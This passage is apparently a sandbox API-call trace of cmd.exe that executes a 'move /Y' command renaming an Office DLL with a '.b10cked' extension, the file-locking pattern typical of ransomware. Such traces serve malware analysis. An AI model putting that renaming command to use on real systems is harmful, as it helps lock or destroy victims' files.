lpAddress=0x70000, lpBuffer=0x16f8ac, dwLength=0x1c | out: lpBuffer=0x16f8ac*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0173.754] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f8ac, dwLength=0x1c | out: lpBuffer=0x16f8ac*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0173.754] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16f8ac, dwLength=0x1c | out: lpBuffer=0x16f8ac*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.754] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f8ac, dwLength=0x1c | out: lpBuffer=0x16f8ac*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0173.754] GetConsoleOutputCP () returned 0x1b5 [0173.754] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.754] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0173.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.754] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0173.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.754] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.754] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.754] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.754] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.755] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.755] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0173.755] GetEnvironmentStringsW () returned 0x240210* [0173.755] FreeEnvironmentStringsW 
(penv=0x240210) returned 1 [0173.755] GetEnvironmentStringsW () returned 0x240210* [0173.755] FreeEnvironmentStringsW (penv=0x240210) returned 1 [0173.755] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e84c | out: phkResult=0x16e84c*=0x40) returned 0x0 [0173.755] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x0, lpData=0x16e858*=0xa0, lpcbData=0x16e850*=0x1000) returned 0x2 [0173.755] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x4, lpData=0x16e858*=0x1, lpcbData=0x16e850*=0x4) returned 0x0 [0173.755] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x0, lpData=0x16e858*=0x1, lpcbData=0x16e850*=0x1000) returned 0x2 [0173.755] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x4, lpData=0x16e858*=0x0, lpcbData=0x16e850*=0x4) returned 0x0 [0173.755] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x4, lpData=0x16e858*=0x40, lpcbData=0x16e850*=0x4) returned 0x0 [0173.755] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x4, lpData=0x16e858*=0x40, lpcbData=0x16e850*=0x4) returned 0x0 [0173.755] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x0, lpData=0x16e858*=0x40, 
lpcbData=0x16e850*=0x1000) returned 0x2 [0173.755] RegCloseKey (hKey=0x40) returned 0x0 [0173.755] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e84c | out: phkResult=0x16e84c*=0x40) returned 0x0 [0173.756] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x0, lpData=0x16e858*=0x40, lpcbData=0x16e850*=0x1000) returned 0x2 [0173.756] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x4, lpData=0x16e858*=0x1, lpcbData=0x16e850*=0x4) returned 0x0 [0173.756] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x0, lpData=0x16e858*=0x1, lpcbData=0x16e850*=0x1000) returned 0x2 [0173.756] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x4, lpData=0x16e858*=0x0, lpcbData=0x16e850*=0x4) returned 0x0 [0173.756] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x4, lpData=0x16e858*=0x9, lpcbData=0x16e850*=0x4) returned 0x0 [0173.756] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x4, lpData=0x16e858*=0x9, lpcbData=0x16e850*=0x4) returned 0x0 [0173.756] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x0, lpData=0x16e858*=0x9, lpcbData=0x16e850*=0x1000) returned 0x2 [0173.756] RegCloseKey (hKey=0x40) 
returned 0x0 [0173.756] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886389 [0173.756] srand (_Seed=0x5b886389) [0173.756] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked\"" [0173.756] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked\"" [0173.756] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.756] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x241970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0173.756] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0173.756] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0173.757] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.757] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0173.757] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0173.757] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0173.757] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0173.757] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0173.757] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0173.757] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0173.757] 
_wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0173.757] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0173.757] GetEnvironmentStringsW () returned 0x242360* [0173.757] FreeEnvironmentStringsW (penv=0x242360) returned 1 [0173.757] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.757] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.757] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0173.757] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0173.757] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0173.757] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0173.757] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0173.757] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0173.757] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0173.757] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0173.757] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f618 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.757] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f618, lpFilePart=0x16f614 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f614*="Desktop") returned 0x18 [0173.757] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.757] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f394 | out: lpFindFileData=0x16f394) returned 0x2409f0 [0173.758] FindClose (in: hFindFile=0x2409f0 | out: hFindFile=0x2409f0) returned 1 [0173.758] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f394 | out: lpFindFileData=0x16f394) returned 0x2409f0 [0173.758] FindClose (in: 
hFindFile=0x2409f0 | out: hFindFile=0x2409f0) returned 1 [0173.758] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f394 | out: lpFindFileData=0x16f394) returned 0x2409f0 [0173.758] FindClose (in: hFindFile=0x2409f0 | out: hFindFile=0x2409f0) returned 1 [0173.758] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.758] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0173.758] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0173.758] GetEnvironmentStringsW () returned 0x240210* [0173.758] FreeEnvironmentStringsW (penv=0x240210) returned 1 [0173.758] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.759] GetConsoleOutputCP () returned 0x1b5 [0173.759] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.759] GetUserDefaultLCID () returned 0x409 [0173.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0173.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f758, cchData=128 | out: lpLCData="0") returned 2 [0173.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f758, cchData=128 | out: lpLCData="0") returned 2 [0173.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f758, cchData=128 | out: lpLCData="1") returned 2 [0173.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0173.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0173.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0173.760] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0173.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0173.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0173.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0173.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0173.760] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0173.760] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0173.760] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0173.760] GetConsoleTitleW (in: lpConsoleTitle=0x230930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.761] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.761] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0173.761] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0173.761] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0173.761] _wcsicmp (_String1="move", _String2=")") returned 68 [0173.761] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0173.761] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0173.761] _wcsicmp (_String1="IF", _String2="move") returned -4 [0173.762] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0173.762] _wcsicmp (_String1="REM", _String2="move") returned 5 [0173.762] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0173.765] GetConsoleTitleW (in: lpConsoleTitle=0x16f450, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.765] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0173.765] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0173.765] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0173.765] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0173.765] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0173.765] _wcsicmp (_String1="move", _String2="CD") returned 10 [0173.765] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0173.765] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0173.765] _wcsicmp (_String1="move", _String2="REN") returned -5 [0173.765] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0173.765] _wcsicmp (_String1="move", _String2="SET") returned -6 [0173.765] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0173.765] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0173.765] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0173.765] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0173.766] _wcsicmp (_String1="move", _String2="MD") returned 11 [0173.766] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0173.766] _wcsicmp (_String1="move", _String2="RD") returned -5 [0173.766] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0173.766] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0173.766] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0173.766] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0173.766] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0173.766] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0173.766] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0173.766] _wcsicmp (_String1="move", _String2="VER") returned -9 [0173.766] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0173.766] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0173.766] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0173.766] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0173.766] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0173.766] _wcsicmp (_String1="move", _String2="START") returned -6 [0173.766] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0173.766] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0173.766] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0173.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.768] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f20c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f204, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f204*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0173.768] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0173.768] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0173.768] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0173.770] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0173.770] _wcsicmp (_String1="VISINT~1.TRX", _String2=".") returned 72 [0173.770] _wcsicmp 
(_String1="VISINT~1.TRX", _String2="..") returned 72 [0173.770] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visint~1.trx")) returned 0x2020 [0173.770] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x241f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.770] SetErrorMode (uMode=0x0) returned 0x0 [0173.770] SetErrorMode (uMode=0x1) returned 0x0 [0173.770] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX", nBufferLength=0x104, lpBuffer=0x16eb94, lpFilePart=0x16eb7c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX", lpFilePart=0x16eb7c*="VISINT~1.TRX") returned 0x3c [0173.770] SetErrorMode (uMode=0x0) returned 0x1 [0173.770] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0173.771] _wcsicmp (_String1="VISINT~1.TRX", _String2=".") returned 72 [0173.771] _wcsicmp (_String1="VISINT~1.TRX", _String2="..") returned 72 [0173.771] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visint~1.trx")) returned 0x2020 [0173.771] SetErrorMode (uMode=0x0) returned 0x0 [0173.771] SetErrorMode (uMode=0x1) returned 0x0 [0173.771] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX", nBufferLength=0x104, lpBuffer=0x16f010, lpFilePart=0x16eda8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX", lpFilePart=0x16eda8*="VISINT~1.TRX") returned 0x3c [0173.771] SetErrorMode (uMode=0x0) returned 0x1 [0173.771] SetErrorMode (uMode=0x0) returned 0x0 [0173.771] SetErrorMode (uMode=0x1) returned 0x0 [0173.771] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x16f218, lpFilePart=0x16eda8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked", lpFilePart=0x16eda8*="VISINTL.DLL.trx_dll.b10cked") returned 0x4b [0173.771] SetErrorMode (uMode=0x0) returned 0x1 [0173.771] SetLastError (dwErrCode=0x0) [0173.771] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visintl.dll.trx_dll.b10cked")) returned 0xffffffff [0173.771] GetLastError () returned 0x2 [0173.771] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x16e724, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e724) returned 0x242130 [0173.772] FindNextFileW (in: hFindFile=0x242130, lpFindFileData=0x16e724 | out: lpFindFileData=0x16e724) returned 0 [0173.772] GetLastError () returned 0x12 [0173.772] FindClose (in: hFindFile=0x242130 | out: hFindFile=0x242130) returned 1 [0173.774] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x241cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x241cc0) returned 0x242130 [0173.774] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x16e9bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0173.774] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x16e9bc, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x43 [0173.774] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visintl.dll.trx_dll")) returned 0x2020 [0173.774] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0173.775] FindClose (in: hFindFile=0x242130 | out: hFindFile=0x242130) returned 1 [0173.775] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16e970 | out: _Buffer=" 1") returned 9 [0173.775] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.775] GetFileType (hFile=0x7) returned 0x2 [0173.905] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.906] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16e8fc | out: lpMode=0x16e8fc) returned 1 [0173.906] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.906] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, 